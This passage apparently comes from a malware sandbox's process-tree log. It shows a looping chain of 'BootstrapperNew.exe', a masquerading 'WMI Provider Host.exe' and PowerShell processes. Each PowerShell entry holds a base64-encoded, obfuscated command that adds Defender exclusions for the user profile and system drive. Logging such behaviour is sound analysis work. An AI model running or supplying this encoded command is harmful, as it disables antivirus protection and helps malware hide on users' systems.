        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        65⤵
        
        PID:5192
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        66⤵
        
        PID:5312
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        66⤵
        
        PID:6752
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        66⤵
        
        PID:5332
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        67⤵
        
        PID:3368
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        67⤵
        
        PID:3208
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        67⤵
        
        PID:7268
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        68⤵
        
        PID:7320
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        68⤵
        
        PID:3080
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        68⤵
        
        PID:7476
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        69⤵
        
        PID:3764
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        69⤵
        
        PID:6828
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        69⤵
        
        PID:7272
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        70⤵
        
        PID:7792
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        70⤵
        
        PID:5700
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        70⤵
        
        PID:6552
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        71⤵
        
        PID:3140
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        71⤵
        
        PID:7076
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        71⤵
        
        PID:7156
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        72⤵
        
        PID:7556
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        72⤵
        
        PID:4680
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        72⤵
        
        PID:8172
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        73⤵
        
        PID:7788
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        73⤵
        
        PID:2216
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        73⤵
        
        PID:1432
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        74⤵
        
        PID:6472
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        74⤵
        
        PID:1556
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        74⤵
        
        PID:7100
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        75⤵
        
        PID:6692
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        75⤵
        
        PID:6096
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        75⤵
        
        PID:4784
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        76⤵
        
        PID:1684
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        76⤵
        
        PID:7284
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        76⤵
        
        PID:6728
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        77⤵
        
        PID:6216
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        77⤵
        
        PID:7268
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        77⤵
        
        PID:6556
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        78⤵
        
        PID:5752
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        78⤵
        
        PID:6500
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        78⤵
        
        PID:2904
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        79⤵
        
        PID:7440
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        79⤵
        
        PID:1576
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        79⤵
        
        PID:1908
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        80⤵
        
        PID:5448
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        80⤵
        
        PID:6552
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        80⤵
        
        PID:4864
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        81⤵
        
        PID:4632
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        81⤵
        
        PID:7160
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        81⤵
        
        PID:1316
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        82⤵
        
        PID:5556
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        82⤵
        
        PID:5356
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        82⤵
        
        PID:5408
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        83⤵
        
        PID:5644
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        83⤵
        
        PID:5816
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        83⤵
        
        PID:3428
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        84⤵
        
        PID:4620
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        84⤵
        
        PID:5636
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        84⤵
        
        PID:5956
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        85⤵
        
        PID:4792
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        85⤵
        
        PID:3472
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        85⤵
        
        PID:5624
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        86⤵
        
        PID:864
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        86⤵
        
        PID:5796
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        86⤵
        
        PID:5352
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        87⤵
        
        PID:6636
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        87⤵
        
        PID:7524
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        87⤵
        
        PID:8016
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        88⤵
        
        PID:7464
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        88⤵
        
        PID:8184
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        88⤵
        
        PID:2988
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        89⤵
        
        PID:6776
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        89⤵
        
        PID:6696
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        89⤵
        
        PID:4140
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        90⤵
        
        PID:6500
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        90⤵
        
        PID:2004
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        90⤵
        
        PID:1260
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        91⤵
        
        PID:2780
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        91⤵
        
        PID:7156
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        91⤵
        
        PID:3564
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        92⤵
        
        PID:6324
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        92⤵
        
        PID:6548
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        92⤵
        
        PID:6864
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        93⤵
        
        PID:1860
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        93⤵
        
        PID:5500
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        93⤵
        
        PID:116
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
